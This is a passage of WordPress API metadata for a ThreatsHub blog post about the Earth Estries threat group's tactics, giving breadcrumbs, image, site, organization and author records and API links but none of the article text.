News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/11\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/11\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations.png","width":976,"height":533},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : APT&amp;Targeted Attacks","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-apttargeted-attacks\/"},{"@type":"ListItem","position":3,"name":"Breaking Down Earth Estries&#8217; Persistent TTPs in Prolonged Cyber Operations"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57624","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=57624"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57624\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/57625"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=57624"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=57624"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=57624"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}